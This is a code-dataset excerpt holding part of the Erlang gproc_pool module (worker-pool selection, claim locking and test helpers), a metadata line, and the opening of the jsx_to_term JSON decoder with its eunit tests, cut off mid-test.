%% @doc Remove a previously added worker.
%%
%% This function will assume that any connected worker is disconnected first.
%% It will fail if there is no such pool, but will return `true' in the case
%% when `Name' did not exist in the pool in the first place.
%% @end
remove_worker(Pool, Name) ->
call({remove_worker, Pool, Name}).
%% @spec whereis_worker(Pool::any(), Name::any()) -> pid() | undefined
%% @doc Look up the pid of a connected worker.
%%
%% This function works similarly to `gproc:where/1': it will return the pid
%% of the worker connected as `Pool / Name', if there is such a worker; otherwise
%% it will return `undefined'. It will raise an exception if `Name' has not been
%% added to the pool.
%% @end
whereis_worker(Pool, Name) ->
ID = worker_id(Pool, Name),
gproc:where(ID).
%% @spec worker_id(Pool, Name) -> GprocName
%% @doc Return the unique gproc name corresponding to a name in the pool.
%%
%% This function assumes that `Name' has been added to `Pool'. It returns the
%% unique name that a connected worker will be registered as. This doesn't mean
%% that there is, in fact, such a connected worker.
%% @end
worker_id(Pool, Name) ->
N = gproc:get_attribute(?POOL_WRK(Pool, Name), shared, n),
{n, l, [?MODULE, Pool, N, Name]}.
%% @spec active_workers(Pool::any()) -> [{Name, Pid}]
%% @doc Return a list of currently connected workers in the pool.
%%
active_workers(Pool) ->
gproc:select(
{l,n},
[{ {{n,l,[?MODULE,Pool,'$1','$2']},'$3','_'}, [{is_integer, '$1'}],
[{{'$2', '$3'}}] }]).
%% @spec defined_workers(Pool::any()) -> [{Name, Pos, Count}]
%% @doc Return a list of added workers in the pool.
%%
%% The added workers are slots in the pool that have been given names, and thus
%% can be connected to. This function doesn't detect whether or not there are
%% any connected (active) workers.
%%
%% The list contains `{Name, Pos, Count}', where `Name' is the name of the added
%% worker, `Pos' is its position in the pool, and `Count' represents the number
%% of times the worker has been picked (assuming callers keep count by explicitly
%% calling {@link log/1}).
%% @end
defined_workers(Pool) ->
K = ?POOL(Pool),
[{N, Pos, gproc:get_value(?POOL_WRK(Pool, N), shared)}
|| {N, Pos} <- get_workers_(K)].
%% @spec worker_pool(Pool::any()) -> [integer() | {Name, Pos}]
%% @doc Return a list of slots and/or named workers in the pool.
%%
%% This function is mainly for testing, but can also be useful when implementing
%% your own worker placement algorithm on top of gproc_pool.
%%
%% A plain integer represents an unfilled slot, and `{Name, Pos}' represents an
%% added worker. The pool is always filled to the current size.
%% @end
worker_pool(Pool) ->
get_workers_(?POOL(Pool)).
%% @spec pick(Pool::any()) -> GprocName | false
%% @doc Pick a worker from the pool given the pool's load-balancing algorithm.
%%
%% The pool types that allows picking without an extra argument are
%% round_robin and random. This function returns `false' if there is no available
%% worker, or if `Pool' is not a valid pool.
%% @end
pick(Pool) ->
case gproc:get_value(?POOL(Pool), shared) of
{0, _} -> false;
{Sz, Type} when Type == round_robin; Type == random ->
pick(Pool, Sz, Type, name);
_ ->
error(badarg)
end.
%% @spec pick_worker(Pool::any()) -> pid() | false
%% @doc Pick a worker pid from the pool given the pool's load-balancing algorithm.
%%
%% Like {@link pick/1}, but returns the worker pid instead of the name.
%% @end
pick_worker(Pool) ->
case gproc:get_value(?POOL(Pool), shared) of
{0, _} -> false;
{Sz, Type} when Type == round_robin; Type == random ->
pick(Pool, Sz, Type, pid);
_ ->
error(badarg)
end.
%% @spec pick(Pool::any(), Value::any()) -> GprocName | false
%% @doc Pick a worker from the pool based on `Value'.
%%
%% The pool types that allows picking based on an extra argument are
%% hash and direct. This function returns `false' if there is no available
%% worker, or if `Pool' is not a valid pool.
%%
%% If the pool is of type `direct', `Value' must be an integer corresponding to
%% a position in the pool (modulo the size of the pool). If the type is
%% `hash', `Value' may be any term, and its hash value will serve as a guide for
%% selecting a worker.
%% @end
pick(Pool, N) ->
case gproc:get_value(?POOL(Pool), shared) of
{0, _} -> false;
{Sz, Type} when Type == hash; Type == direct ->
pick(Pool, Sz, Type, N, name);
_ ->
error(badarg)
end.
%% @spec pick_worker(Pool::any(), Value::any()) -> pid() | false
%% @doc Pick a worker pid from the pool given the pool's load-balancing algorithm.
%%
%% Like {@link pick/2}, but returns the worker pid instead of the name.
%% @end
pick_worker(Pool, N) ->
case gproc:get_value(?POOL(Pool), shared) of
{0, _} -> false;
{Sz, Type} when Type == hash; Type == direct ->
pick(Pool, Sz, Type, N, pid);
_ ->
error(badarg)
end.
pick(Pool, Sz, round_robin, Ret) ->
Next = incr(Pool, 1, Sz),
case ets:next(gproc, {{n,l,[?MODULE,Pool,Next]},n}) of
{{n,l,[?MODULE,Pool,Actual,_Name]} = Pick, _} ->
case Actual - Next of
Diff when Diff > 1 ->
gproc:update_counter(
?POOL_CUR(Pool), shared, {Diff, Sz, 1}),
ret(Pick, Ret);
_ ->
ret(Pick, Ret)
end;
_ ->
case ets:next(gproc, {{n,l,[?MODULE,Pool,0]}, n}) of
{{n,l,[?MODULE,Pool,Actual1,_Name1]} = Pick, _} ->
incr(Pool, Sz-Next+Actual1, Sz),
%% gproc:update_counter(
%% ?POOL_CUR(Pool), shared, {Sz-Next+Actual1, Sz, 1}),
ret(Pick, Ret);
_ ->
false
end
end;
pick(Pool, Sz, random, Ret) ->
pick_near(Pool, rand:uniform(Sz), Ret).
pick(Pool, Sz, hash, Val, Ret) ->
pick_near(Pool, erlang:phash2(Val, Sz) + 1, Ret);
pick(Pool, Sz, direct, N, Ret) when is_integer(N), N > 0 ->
pick_near(Pool, case (N rem Sz-1) + 1 of 0 -> Sz; N1 -> N1 end, Ret).
pick_near(Pool, N, Ret) ->
case ets:next(gproc, {{n,l,[?MODULE,Pool,N]}, n}) of
{{n,l,[?MODULE,Pool,_,_]} = Pick, _} ->
ret(Pick, Ret);
_ ->
%% wrap
case ets:next(gproc, {{n,l,[?MODULE,Pool,1]}, n}) of
{{n,l,[?MODULE,Pool,_,_]} = Pick, _} ->
ret(Pick, Ret);
_ ->
false
end
end.
ret(Name, name) ->
Name;
ret(Name, pid) ->
case ets:lookup(gproc, {Name,n}) of
[{_, Pid, _}] ->
Pid;
[] ->
%% possible race
false
end.
%% @equiv claim(Pool, F, nowait)
claim(Pool, F) when is_function(F, 2) ->
claim(Pool, F, nowait).
%% @spec claim(Pool, Fun, Wait) -> {true, Res} | false
%% Pool = any()
%% Fun = function()
%% Wait = nowait | {busy_wait, integer()}
%%
%% @doc Picks the first available worker in the pool and applies `Fun'.
%%
%% A `claim' pool allows the caller to "claim" a worker during a short span
%% (essentially, a lock is set and released as soon as `Fun' returns).
%% Once a worker is selected, `Fun(Name, Pid)' is called, where `Name' is a
%% unique gproc name of the worker, and `Pid' is its process identifier.
%% The gproc name of the worker serves as a mutex, where its value is 0 (zero)
%% if the worker is free, and 1 (one) if it is busy. The mutex operation is
%% implemented using `gproc:update_counter/2'.
%%
%% `Wait == nowait' means that the call will return `false' immediately if
%% there is no available worker.
%%
%% `Wait == {busy_wait, Timeout}' will keep repeating the claim attempt
%% for `Timeout' milliseconds. If still no worker is available, it will
%% return `false'.
%% @end
claim(Pool, F, Wait) ->
case gproc:get_value(?POOL(Pool), shared) of
{0, _} -> false;
{_, claim} ->
W = setup_wait(Wait, Pool),
claim_w(Pool, F, W);
_ ->
error(badarg)
end.
claim_w(_Pool, _F, timeout) ->
false;
claim_w(Pool, F, W) ->
case claim_(Pool, F) of
false ->
claim_w(Pool, F, do_wait(W));
Other ->
clear_wait(W),
Other
end.
%% Define how many workers to select in each chunk. We want to strike
%% a good compromise between the cost of succeeding on the first try
%% (likely a common event) and the cost of retrying. In my measurements,
%% if a chunk size of 1 costs ca 30 us (on my Macbook), a chunk size of 5
%% adds only ca 20% to the cost, i.e. a few us.
-define(CLAIM_CHUNK, 5).
claim_(Pool, F) ->
%% Sorry, but we use ets:select/3 here in order to shave off a few us.
case ets:select(gproc, [{ {{{n,l,[?MODULE,Pool,'_','_']},n}, '$1', 0}, [],
[{{ {element,1,{element,1,'$_'}}, '$1' }}]}],
?CLAIM_CHUNK) of
{[_|_] = Workers, Cont} ->
case try_claim(Workers, F) of
{true, _} = True ->
True;
false ->
claim_cont(Cont, F)
end;
_ ->
false
end.
claim_cont('$end_of_table', _) ->
false;
claim_cont(Cont, F) ->
case ets:select(Cont) of
{[_|_] = Workers, Cont1} ->
case try_claim(Workers, F) of
{true, _} = True ->
True;
false ->
claim_cont(Cont1, F)
end;
_ ->
false
end.
try_claim([], _) ->
false;
try_claim([{K,Pid}|T], F) ->
case try_claim(K, Pid, F) of
false ->
try_claim(T, F);
Other ->
Other
end.
try_claim(K, Pid, F) ->
case gproc:update_counter(K, [0, {1, 1, 1}]) of
[0, 1] ->
%% have lock
execute_claim(F, K, Pid);
[1, 1] ->
%% no
false
end.
%% Wrapper to handle the case where the claimant gets killed by another
%% process while executing within the critical section.
%% This is likely a rare case, but if it happens, the claim would never
%% get released.
%% Solution:
%% - spawn a monitoring process which resets the claim if the parent dies
%% (spawn_link() might be more efficient, but we cannot enable trap_exit
%% atomically, which introduces a race condition).
%% - for all return types, kill the monitor and release the claim.
%% - the one case where the monitor *isn't* killed is when Parent itself
%% is killed before executing the `after' clause. In this case, it should
%% be safe to release the claim from the monitoring process.
%%
%% Overhead in the normal case:
%% - spawning the monitoring process
%% - (possibly scheduling the monitoring process to set up the monitor)
%% - killing the monitoring process (untrappably)
%% Timing the overhead over 100,000 claims on a Core i7 MBP running OTP 17,
%% this wrapper increases the cost of a minimal claim from ca 3 us to
%% ca 7-8 us.
execute_claim(F, K, Pid) ->
Parent = self(),
Mon = spawn(
fun() ->
Ref = erlang:monitor(process, Parent),
receive
{'DOWN', Ref, _, _, _} ->
gproc:reset_counter(K)
end
end),
try begin
Res = F(K, Pid),
{true, Res}
end
after
exit(Mon, kill),
gproc:reset_counter(K)
end.
setup_wait(nowait, _) ->
nowait;
setup_wait({busy_wait, MS}, Pool) ->
Ref = erlang:send_after(MS, self(), {claim, Pool}),
{busy_wait, Ref}.
do_wait(nowait) ->
timeout;
do_wait({busy_wait, Ref} = W) ->
%% Yielding here serves two purposes:
%% 1) Increase the chance that whoever's before us can finish
%% 2) The value of read_timer/1 only refreshes after yield (so I've heard)
erlang:yield(),
case erlang:read_timer(Ref) of
false ->
erlang:cancel_timer(Ref),
timeout;
_ ->
W
end.
clear_wait(nowait) ->
ok;
clear_wait({busy_wait, Ref}) ->
erlang:cancel_timer(Ref),
ok.
%% @spec log(GprocKey) -> integer()
%% @doc Update a counter associated with a worker name.
%%
%% Each added worker has a gproc counter that can be used e.g. to keep track of
%% the number of times the worker has been picked. Since it's associated with the
%% named 'slot', and not to the connected worker, its value will persist even
%% if the currently connected worker dies.
%% @end
log({n,l,[?MODULE,Pool,_,Name]}) ->
gproc:update_shared_counter(?POOL_WRK(Pool,Name), 1).
%% @spec randomize(Pool::any()) -> integer()
%% @doc Randomizes the "next" pointer for the pool.
%%
%% This function only has an effect for `round_robin' pools, which have a
%% reference to the next worker to be picked. Without randomizing, the load
%% balancing will always start with the first worker in the pool.
%% @end
randomize(Pool) ->
case pool_size(Pool) of
0 -> 0;
1 -> 1;
Sz ->
incr(Pool, rand:uniform(Sz) - 1, Sz)
end.
%% @spec pool_size(Pool::any()) -> integer()
%% @doc Return the size of the pool.
%%
pool_size(Pool) ->
{Sz, _} = gproc:get_value(?POOL(Pool), shared),
Sz.
%% ===================================================================
%% Start, stop, call gen_server
%% @private
start_link() ->
gen_server:start_link({local, ?MODULE}, ?MODULE, [], []).
%% @private
init([]) ->
{ok, #st{}}.
%% @private
call(Req) ->
case gen_server:call(?MODULE, Req) of
badarg ->
error(badarg);
{badarg, Reason} ->
error(Reason);
Reply ->
Reply
end.
%% ===================================================================
%% Gen_server callbacks
%% @private
handle_call(Req, From, S) ->
try handle_call_(Req, From, S)
catch
error:Reason ->
{reply, {badarg, Reason}, S}
end.
handle_call_({new, Pool, Type, Opts}, _, S) ->
new_(Pool, Type, Opts),
{reply, ok, S};
handle_call_({delete, Pool}, _, S) ->
delete_(Pool),
{reply, ok, S};
handle_call_({force_delete, Pool}, _, S) ->
force_delete_(Pool),
{reply, ok, S};
handle_call_({add_worker, Pool, Name}, _, S) ->
N = add_worker_(Pool, Name),
{reply, N, S};
handle_call_({add_worker, Pool, Name, Pos}, _, S) ->
N = add_worker_(Pool, Name, Pos),
{reply, N, S};
handle_call_({set_pool_size, Pool, Sz}, _, S) ->
Workers = get_workers_(Pool),
case get_last_worker_n(Workers) of
N when N > Sz ->
{reply, badarg, S};
_ ->
set_pool_size_(?POOL(Pool), Sz, Workers),
{reply, true, S}
end;
handle_call_({remove_worker, Pool, Name}, _, S) ->
ok = remove_worker_(Pool, Name),
{reply, true, S}.
%% @private
handle_cast(_, S) ->
{noreply, S}.
%% @private
handle_info(_, S) ->
{noreply, S}.
%% @private
terminate(_, _) ->
ok.
%% @private
code_change(_, S, _) ->
{ok, S}.
%% ===================================================================
%% Internal functions
new_(Pool, Type, Opts) ->
valid_type(Type),
Size = proplists:get_value(size, Opts, 0),
Workers = lists:seq(1, Size),
K = ?POOL(Pool),
try gproc:reg_shared(K, {Size, Type})
catch
error:_ -> error(exists)
end,
Opts1 =
case lists:keyfind(auto_size, 1, Opts) of
false ->
Opts ++ [{auto_size, not lists:keymember(size, 1, Opts)}];
{_, Bool} when is_boolean(Bool) ->
Opts
end,
gproc:set_attributes_shared(K, Opts1),
set_workers(K, Workers),
gproc:reg_shared(?POOL_CUR(Pool), Size).
valid_type(T) when T==round_robin; T==hash; T==random; T==direct; T==claim ->
true;
valid_type(_) ->
error(invalid_type).
set_pool_size_(K, Sz, Workers) ->
{_, Type} = gproc:get_value(K, shared),
case length(Workers) of
Sz ->
set_workers(K, Workers);
Len when Len > Sz ->
Workers1 = lists:sublist(Workers, 1, Sz),
set_workers(K, Workers1);
Len when Len < Sz ->
Workers1 = Workers ++ lists:seq(Len+1, Sz),
set_workers(K, Workers1)
end,
gproc:set_value_shared(K, {Sz, Type}).
delete_(Pool) ->
K = ?POOL(Pool),
Ws = get_workers_(K),
case [1 || {_,_} <- Ws] of
[] ->
gproc:unreg_shared(K),
gproc:unreg_shared(?POOL_CUR(Pool));
[_|_] ->
error(not_empty)
end.
force_delete_(Pool) ->
Props = gproc:select({l,p}, [{ {?POOL(Pool), '_', '_'}, [], ['$_']}]),
Cur = gproc:select({l,c}, [{ {?POOL_CUR(Pool), '_', '_'}, [], ['$_']}]),
Workers = gproc:select(
{l,c}, [{ {?POOL_WRK(Pool,'_'), '_', '_'}, [], ['$_']}]),
Names = find_names(Pool, '_'),
lists:foreach(
fun({Key, Pid, _}) when Pid == self() -> gproc:unreg(Key);
({_, Pid, _}) when is_pid(Pid) -> exit(Pid, kill)
end, Names),
[gproc:unreg_shared(W) || {W,shared,_} <- Cur ++ Props ++ Workers],
true.
find_names(Pool, Pid) ->
gproc:select(
{l,n}, [{ {{n,l,[?MODULE,Pool,Pid,'_']}, '_', '_'}, [], ['$_']}]).
add_worker_(Pool, Name) ->
K = ?POOL(Pool),
{Sz, Type} = gproc:get_value(K, shared),
AutoSz = gproc:get_attribute(K, shared, auto_size),
Ws0 = get_workers_(K),
{N,Ws1} =
case lists:keymember(Name, 1, Ws0) of
false ->
case find_slot(Name, K, Ws0, Sz, Type, AutoSz) of
{_, _} = Res ->
Res;
false ->
error(pool_full)
end;
true ->
error(exists)
end,
if N > Sz ->
set_pool_size_(K, N, Ws1); % also calls set_workers/2
true ->
%% size not changed
set_workers(K, Ws1)
end,
reg_worker(Pool, Name, N),
N.
add_worker_(Pool, Name, Pos) ->
K = ?POOL(Pool),
{Sz, _} = gproc:get_value(K, shared),
Ws0 = get_workers_(K),
if Pos > Sz ->
case gproc:get_attribute(K, shared, auto_size) of
true ->
Ws1 = Ws0 ++ lists:seq(Sz+1,Pos-1) ++ [{Name, Pos}],
set_pool_size_(K, Pos, Ws1);
false ->
error(out_of_range)
end;
true ->
case lists:nth(Pos, Ws0) of
{_,_} -> error(exists);
P when is_integer(P) ->
Ws1 = set_pos(Pos, Ws0, {Name, Pos}),
set_workers(K, Ws1)
end
end,
reg_worker(Pool, Name, Pos),
Pos.
reg_worker(Pool, Name, Pos) ->
gproc:reg_shared(Wrk = ?POOL_WRK(Pool, Name), 0),
gproc:set_attributes_shared(Wrk, [{n, Pos}]).
remove_worker_(Pool, Name) ->
case whereis_worker(Pool, Name) of
Pid when is_pid(Pid) ->
error({worker_connected, Pid});
undefined ->
do_remove_worker_(Pool, Name)
end.
do_remove_worker_(Pool, Name) ->
K = ?POOL(Pool),
Ws0 = get_workers_(K),
Ws1 = del_slot(Name, Ws0),
gproc:unreg_shared(?POOL_WRK(Pool, Name)),
case (NewLen = length(Ws1)) - length(Ws0) of
0 -> ok;
Diff when Diff < 0 ->
{_, Type} = gproc:get_value(K, shared),
gproc:set_value_shared(K, {NewLen, Type})
end,
gproc:set_attributes_shared(K, [{workers, Ws1}]),
ok.
del_slot(Name, [{Name,_}]) ->
[];
del_slot(Name, [{Name, Pos}|T]) ->
[Pos|T];
del_slot(Name, [H|T]) ->
[H|del_slot(Name, T)].
find_slot(Name, _, [], Sz, _, Auto) ->
case {Sz, Auto} of
{0, false} -> false;
{_, _} ->
{1, [{Name, 1}]}
end;
find_slot(Name, Key, Workers, Sz, Type, AutoSz) ->
case get_strategy(Key, Type) of
packed ->
find_slot_packed(Name, Workers, AutoSz);
sparse ->
find_slot_sparse(Name, Workers, Sz, AutoSz)
end.
%% find_slot(Name, Key, Workers, Sz, Type, AutoSz, Strategy).
%% find_slot(Name, []) ->
%% {1, [{Name, 1}]};
%% find_slot(Name, Slots) ->
%% find_slot(Name, Slots, []).
get_last_worker_n(Ws) ->
get_last_worker_n(Ws, 0, 1).
get_last_worker_n([{_,_}|T], _, P) ->
get_last_worker_n(T, P, P+1);
get_last_worker_n([H|T], Last, P) when is_integer(H) ->
get_last_worker_n(T, Last, P+1);
get_last_worker_n([], Last, _) ->
Last.
find_slot_packed(Name, Workers, AutoSz) ->
find_slot_packed(Name, Workers, AutoSz, []).
find_slot_packed(Name, [N|T], _, Acc) when is_integer(N) -> % empty slot
{N, lists:reverse(Acc) ++ [{Name, N}|T]};
find_slot_packed(Name, [{_,Prev} = Last], true, Acc) -> % last elem; expand pool
New = Prev+1,
{New, lists:reverse([{Name, New}, Last|Acc])};
find_slot_packed(_, [_], false, _) ->
false;
find_slot_packed(Name, [{_,_} = H|T], Auto, Acc) ->
find_slot_packed(Name, T, Auto, [H|Acc]).
find_slot_sparse(Name, Ws, Sz, Auto) ->
%% Collect the position of the first and last filled slots, as well as
%% the largest gap between filled slots
case lists:foldl(
fun(N, {Prev, StartP, First, Last, Max, MaxP}) when is_integer(N) ->
case Prev+1 of
Gap when Gap > Max ->
{Gap, StartP, First, Last, Gap, StartP};
Gap ->
{Gap, StartP, First, Last, Max, MaxP}
end;
(N, []) when is_integer(N) ->
%% skip
[];
({_, Pos}, []) ->
{0, Pos, _First = Pos, _Last = Pos, 0, 0};
({_, Pos}, {Prev, StartP, First, _PrevLast, Max, MaxP}) ->
if Prev > Max ->
{0, Pos, First, Pos, Prev, StartP};
true ->
{0, Pos, First, Pos, Max, MaxP}
end
end, [], Ws) of
[] ->
%% all empty slots
case {Sz, Auto} of
{0, false} ->
false;
{0, true} ->
{1, [{Name, 1}]};
{_, _} when is_integer(Sz), Sz > 0 ->
{1, [{Name, 1}|tl(Ws)]}
end;
{_, _, 1, Last, 0, _} ->
%% Pool full
if Auto ->
NewPos = Last + 1,
{NewPos, Ws ++ [{Name, NewPos}]};
true ->
false
end;
{_, _, First, Last, MaxGap, StartPos} ->
WrapGap = (Sz - Last) + First - 1,
NewPos = if WrapGap >= MaxGap ->
(Last + (WrapGap div 2) + 1) rem (Sz+1);
true ->
(StartPos + (MaxGap div 2) + 1) rem (Sz+1)
end,
{NewPos, set_pos(NewPos, Ws, {Name, NewPos})}
end.
set_pos(P, L, X) when P > 0, is_list(L) ->
set_pos(P, 1, L, X).
set_pos(P, P, [_|T], X) ->
[X|T];
set_pos(P, C, [H|T], X) when C < P ->
[H|set_pos(P, C+1, T, X)].
get_workers_(K) ->
case gproc:get_attribute(K, shared, workers) of
undefined ->
[];
L when is_list(L) ->
L
end.
set_workers(K, L) when is_list(L) ->
gproc:set_attributes_shared(K, [{workers, L}]).
get_strategy(Key, Type) ->
Default = case Type of
round_robin -> packed;
random -> sparse;
hash -> sparse;
direct -> packed;
claim -> packed
end,
attribute(Key, fill_strategy, Default).
attribute(Key, A, Default) ->
case gproc:get_attribute(Key, shared, A) of
undefined -> Default;
Value -> Value
end.
incr(Pool, Incr, Sz) ->
gproc:update_counter(?POOL_CUR(Pool), shared, {Incr, Sz, 1}).
%% find_worker(Pool, Name) ->
%% case gproc:select(n, [{ {{n, l, {?MODULE, Pool, '_'}}, '_', Name},
%% [], ['$_'] }]) of
%% [] ->
%% undefined;
%% [{{n,l,{?MODULE,_,N}}, Pid, _}] ->
%% {N, Pid}
%% end.
%% ============================= Test code ===========================
%% @private
test(N) when N > 0 ->
test(N, round_robin, []).
%% @private
test(N, Type, Opts) when Type==round_robin;
Type==random;
Type==hash;
Type==direct;
Type==claim ->
P = ?LINE,
setup_test_pool(P, Type, Opts),
try timer:tc(?MODULE, f(Type), [N, P])
after
remove_test_pool(P)
end.
ptest(N, I, Type, Opts) ->
P = ?LINE,
setup_test_pool(P, Type, Opts),
F = f(Type),
Pids =
[spawn_monitor(fun() -> exit({ok, timer:tc(?MODULE, F, [I, P])}) end)
|| _ <- lists:seq(1, N)],
try collect(Pids)
after
remove_test_pool(P)
end.
collect(Pids) ->
Results = [receive
{'DOWN', Ref, _, _, Reason} ->
Reason
end || {_, Ref} <- Pids],
{Times, Avgs} = lists:foldr(fun({ok, {T, Avg}}, {A,B}) ->
{[T|A], [Avg|B]} end,
{[],[]}, Results),
{Times, lists:sum(Times)/length(Times),
lists:sum(Avgs)/length(Avgs)}.
f(Type) when Type==hash; Type==direct ->
test_run1;
f(Type) when Type==claim ->
test_run2;
f({empty,_}) ->
test_run0;
f(_) ->
test_run.
%% @private
setup_test_pool(P, Type, Opts) ->
setup_test_pool(P, Type, Opts, test_workers()).
setup_test_pool(P, Type0, Opts, Workers) ->
Type = case Type0 of {_, T} -> T; T when is_atom(T) -> T end,
new(P, Type, Opts),
[begin R = add_worker(P, W),
io:fwrite("add_worker(~p, ~p) -> ~p; Ws = ~p~n",
[P, W, R, get_workers_(?POOL(P))]),
connect_worker(P, W)
end || W <- Workers].
%% @private
remove_test_pool(P) ->
io:fwrite("worker stats (~p):~n"
"~p~n", [P, gproc:select(
{l,c},
[{ {{c,l,{?MODULE,P,w,'$1'}},'_','$2'}, [],
[{{'$1','$2'}}] }])]),
[begin disconnect_worker(P, W),
remove_worker(P, W)
end || W <- test_workers()],
delete(P).
test_workers() -> [a,b,c,d,e,f].
%% @private
test_run(N, P) ->
test_run(N, P, 0, 0).
test_run(N, P, S, M) when N > 0 ->
{T, Worker} = timer:tc(?MODULE, pick, [P]),
true = (Worker =/= false),
log(Worker),
timer:sleep(rand:uniform(49)),
test_run(N-1, P, S+T, M+1);
test_run(_, _, S, M) ->
S/M.
%% @private
test_run1(N, P) ->
test_run1(N, P, 0, 0).
test_run1(N, P, S, M) when N > 0 ->
{T, Worker} = timer:tc(?MODULE, pick, [P, N]),
true = (Worker =/= false),
log(Worker),
timer:sleep(rand:uniform(49)),
test_run1(N-1, P, S+T, M+1);
test_run1(_, _, S, M) ->
S/M.
%% @private
test_run2(N, P) ->
test_run2(N, P, fun(K,_) ->
R = log(K),
timer:sleep(rand:uniform(49)),
R
end, 0, 0).
test_run2(N, P, F, S, M) when N > 0 ->
{T, {true, _}} = timer:tc(?MODULE, claim, [P, F, {busy_wait, 5000}]),
test_run2(N-1, P, F, S+T, M+1);
test_run2(_, _, _, S, M) ->
S/M.
test_run0(N, X) when N > 0 ->
test_run0(N-1, X);
test_run0(_, _) ->
ok. | src/deps/gproc/src/gproc_pool.erl | 0.681303 | 0.476458 | gproc_pool.erl | starcoder |
%% The MIT License
%% Copyright (c) 2011 <NAME> <<EMAIL>>
%% Permission is hereby granted, free of charge, to any person obtaining a copy
%% of this software and associated documentation files (the "Software"), to deal
%% in the Software without restriction, including without limitation the rights
%% to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
%% copies of the Software, and to permit persons to whom the Software is
%% furnished to do so, subject to the following conditions:
%% The above copyright notice and this permission notice shall be included in
%% all copies or substantial portions of the Software.
%% THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
%% IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
%% FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
%% AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
%% LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
%% OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
%% THE SOFTWARE.
-module(jsx_to_term).
-export([to_term/2]).
-export([init/1, handle_event/2]).
-record(opts, {
labels = binary
}).
-type opts() :: list().
-spec to_term(Source::(binary() | list()), Opts::opts()) -> binary().
to_term(Source, Opts) when is_list(Opts) ->
(gen_json:parser(?MODULE, Opts, jsx_utils:extract_opts(Opts)))(Source).
parse_opts(Opts) -> parse_opts(Opts, #opts{}).
parse_opts([{labels, Val}|Rest], Opts)
when Val == binary; Val == atom; Val == existing_atom ->
parse_opts(Rest, Opts#opts{labels = Val});
parse_opts([labels|Rest], Opts) ->
parse_opts(Rest, Opts#opts{labels = binary});
parse_opts([_|Rest], Opts) ->
parse_opts(Rest, Opts);
parse_opts([], Opts) ->
Opts.
init(Opts) -> {[[]], parse_opts(Opts)}.
handle_event(end_json, {[[Terms]], _Opts}) -> Terms;
handle_event(start_object, {Terms, Opts}) -> {[[]|Terms], Opts};
handle_event(end_object, {[[], {key, Key}, Last|Terms], Opts}) ->
{[[{Key, [{}]}] ++ Last] ++ Terms, Opts};
handle_event(end_object, {[Object, {key, Key}, Last|Terms], Opts}) ->
{[[{Key, lists:reverse(Object)}] ++ Last] ++ Terms, Opts};
handle_event(end_object, {[[], Last|Terms], Opts}) ->
{[[[{}]] ++ Last] ++ Terms, Opts};
handle_event(end_object, {[Object, Last|Terms], Opts}) ->
{[[lists:reverse(Object)] ++ Last] ++ Terms, Opts};
handle_event(start_array, {Terms, Opts}) -> {[[]|Terms], Opts};
handle_event(end_array, {[List, {key, Key}, Last|Terms], Opts}) ->
{[[{Key, lists:reverse(List)}] ++ Last] ++ Terms, Opts};
handle_event(end_array, {[Current, Last|Terms], Opts}) ->
{[[lists:reverse(Current)] ++ Last] ++ Terms, Opts};
handle_event({key, Key}, {Terms, Opts}) -> {[{key, format_key(Key, Opts)}] ++ Terms, Opts};
handle_event({_, Event}, {[{key, Key}, Last|Terms], Opts}) ->
{[[{Key, Event}] ++ Last] ++ Terms, Opts};
handle_event({_, Event}, {[Last|Terms], Opts}) ->
{[[Event] ++ Last] ++ Terms, Opts}.
format_key(Key, Opts) ->
case Opts#opts.labels of
binary -> Key
; atom -> binary_to_atom(Key, utf8)
; existing_atom -> binary_to_existing_atom(Key, utf8)
end.
%% eunit tests
-ifdef(TEST).
-include_lib("eunit/include/eunit.hrl").
basic_test_() ->
[
{"empty object", ?_assert(to_term(<<"{}">>, []) =:= [{}])},
{"simple object", ?_assert(to_term(<<"{\"key\": true}">>, []) =:= [{<<"key">>, true}])},
{"less simple object",
?_assert(to_term(<<"{\"a\": 1, \"b\": 2}">>, []) =:= [{<<"a">>, 1}, {<<"b">>, 2}])
},
{"nested object",
?_assert(to_term(<<"{\"key\": {\"key\": true}}">>, []) =:= [{<<"key">>, [{<<"key">>, true}]}])
},
{"empty array", ?_assert(to_term(<<"[]">>, []) =:= [])},
{"list of lists",
?_assert(to_term(<<"[[],[],[]]">>, []) =:= [[], [], []])
},
{"list of strings",
?_assert(to_term(<<"[\"hi\", \"there\"]">>, []) =:= [<<"hi">>, <<"there">>])
},
{"list of numbers",
?_assert(to_term(<<"[1, 2.0, 3e4, -5]">>, []) =:= [1, 2.0, 3.0e4, -5])
},
{"list of literals",
?_assert(to_term(<<"[true,false,null]">>, []) =:= [true,false,null])
},
{"list of objects",
?_assert(to_term(<<"[{}, {\"a\":1, \"b\":2}, {\"key\":[true,false]}]">>, [])
=:= [[{}], [{<<"a">>,1},{<<"b">>,2}], [{<<"key">>,[true,false]}]])
}
].
comprehensive_test_() ->
{"comprehensive test", ?_assert(to_term(comp_json(), []) =:= comp_term())}.
comp_json() ->
<<"[
{\"a key\": {\"a key\": -17.346, \"another key\": 3e152, \"last key\": 14}},
[0,1,2,3,4,5],
[{\"a\": \"a\", \"b\": \"b\"}, {\"c\": \"c\", \"d\": \"d\"}],
[true, false, null],
{},
[],
[{},{}],
{\"key\": [], \"another key\": {}}
]">>.
comp_term() ->
[
[{<<"a key">>, [{<<"a key">>, -17.346}, {<<"another key">>, 3.0e152}, {<<"last key">>, 14}]}],
[0,1,2,3,4,5],
[[{<<"a">>, <<"a">>}, {<<"b">>, <<"b">>}], [{<<"c">>, <<"c">>}, {<<"d">>, <<"d">>}]],
[true, false, null],
[{}],
[],
[[{}], [{}]],
[{<<"key">>, []}, {<<"another key">>, [{}]}]
].
atom_labels_test_() ->
{"atom labels test", ?_assert(to_term(comp_json(), [{labels, atom}]) =:= atom_term())}.
atom_term() ->
[
[{'a key', [{'a key', -17.346}, {'another key', 3.0e152}, {'last key', 14}]}],
[0,1,2,3,4,5],
[[{a, <<"a">>}, {b, <<"b">>}], [{'c', <<"c">>}, {'d', <<"d">>}]],
[true, false, null],
[{}],
[],
[[{}], [{}]],
[{key, []}, {'another key', [{}]}]
].
naked_test_() ->
[
